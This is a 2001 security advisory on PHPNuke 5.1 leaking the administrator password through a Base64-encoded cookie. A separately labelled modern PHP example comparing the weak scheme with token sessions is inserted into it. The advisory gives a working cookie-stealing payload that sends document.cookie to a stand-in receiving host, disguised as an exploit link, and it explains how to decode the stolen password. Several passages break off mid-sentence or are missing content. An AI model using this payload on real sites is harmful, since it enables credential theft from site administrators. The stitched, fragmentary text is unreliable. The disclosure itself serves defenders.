[UNIX] PHPNuke Admin Password Can Be Stolen
From: email@example.com
To: firstname.lastname@example.org
Subject: [UNIX] PHPNuke Admin Password Can Be Stolen
Message-Id: <20011125130805.4E536138BF@mail.der-keiler.de>
Date: Sun, 25 Nov 2001 14:08:05 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
PHPNuke Admin Password Can Be Stolen
Vulnerabilities in PHPNuke expose the administrative password. The
vulnerability lies in PHPNuke's insecure storage of the administrator
password in a cookie.
PHPNuke version 5.1
To successfully exploit this vulnerability you will need to rely on two
Password BASE64 encoding:
The administrator login/password pair is stored in a cookie like this:
Furthermore, the administrator password is BASE64 encoded, making it very
easy to decode.
QWRtaW46TmljZV9Ucnk6DQo= is Admin:Nice_Try:
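The weakness described under "Password BASE64 encoding", next to a session design that keeps the password out of the cookie. This is an added example, not code from the advisory or from PHPNuke. The function names, the in-memory store and the `login:password:` field layout (inferred from the sample string above) are assumptions.

```php
<?php
// Weak pattern from the advisory: the credentials are encoded, not protected.
// Field layout assumed from the advisory's sample value (hypothetical helper).
function legacy_admin_cookie(string $login, string $password): string {
    return base64_encode("$login:$password:\r\n");
}

// Base64 uses no key, so whoever holds the cookie recovers both fields.
function decode_legacy_cookie(string $cookie): ?array {
    $raw = base64_decode($cookie, true);
    if ($raw === false || substr_count($raw, ':') < 2) {
        return null; // not the login:password: layout
    }
    [$login, $password] = explode(':', $raw, 3);
    return ['login' => $login, 'password' => $password];
}

// Hardened pattern: the cookie carries only a random identifier. The server
// keeps a hash of it, so a stolen cookie or store never yields the password.
function issue_session(array &$store, string $login, int $ttl = 1800): string {
    $token = bin2hex(random_bytes(32));
    $store[hash('sha256', $token)] = ['login' => $login, 'expires' => time() + $ttl];
    return $token;
}

function lookup_session(array $store, string $token): ?string {
    $entry = $store[hash('sha256', $token)] ?? null;
    if ($entry === null || $entry['expires'] < time()) {
        return null; // unknown or expired token
    }
    return $entry['login'];
}

// The advisory's sample value round-trips through the weak scheme.
$sample = 'QWRtaW46TmljZV9Ucnk6DQo=';
var_dump(decode_legacy_cookie($sample));
var_dump(legacy_admin_cookie('Admin', 'Nice_Try') === $sample);

$store = [];                         // constructed stand-in for a session table
$token = issue_session($store, 'Admin');
var_dump(lookup_session($store, $token));
// Send $token with setcookie() using the httponly and secure options so
// page script cannot read it and it only travels over HTTPS.
```

A stolen session token can still be replayed until it expires, but it can be revoked server-side and it never discloses the administrator's password.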
About:URLS security vulnerability:
As we reported in a previous article:
<http://www.securiteam.com/windowsntfocus/6I00D1535I.html> Microsoft IE
Cookies Exposure via 'About:' URLS, a vulnerability in Internet Explorer
allows extraction of cookies stored on the remote connecting client (even
if they are not from our cookie domain).
First create a php script that can gather getenv("QUERY_STRING") in a
file. Then create this kind of link and force the PHPNuke administrator to
[script]window.open("http://www.yourwebsite.com/cook.php?"+document.cookie);[/script]"] Hey,this is the last Bind9 remote root exploit ![/a]
(replace [ & ] by )
www.nuked-site.com is the site that you want to get cookie of.
www.yourwebsite.com is the site that will receive the cookie thru the
If the nuked site's admin follows this link, he will send to your script
his cookie with the Base64 encoded password. Then you just have to decode
The information has been provided by
<mailto:aurelien.cabezon@iSecureLabs.com> Cabezon Aurelien.